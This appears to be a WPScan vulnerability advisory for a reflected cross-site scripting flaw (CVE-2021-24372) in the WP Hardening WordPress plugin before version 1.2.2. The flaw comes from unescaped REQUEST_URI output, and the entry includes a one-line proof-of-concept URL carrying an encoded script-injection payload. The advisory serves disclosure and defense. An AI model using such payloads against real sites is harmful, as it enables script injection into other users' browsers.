WordPress Plugin Vulnerabilities

WP Hardening < 1.2.2 - Reflected XSS via URI

Description

The plugin did not sanitise or escape the $_SERVER['REQUEST_URI'] before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue.

Proof of Concept

https://example.com/wp-admin/plugins.php?%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Cv=

Affects Plugins

wp-security-hardening

Fixed in version 1.2.2

References

CVE

CVE-2021-24372

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

Miscellaneous

Original Researcher

dc11

Submitter

dc11

Verified

Yes

WPVDB ID

5340ae4e-95ba-4a69-beb1-3459cac17782

Timeline

Publicly Published

2021-06-07 (about 1 years ago)

Added

2021-06-07 (about 1 years ago)

Last Updated

2021-06-25 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin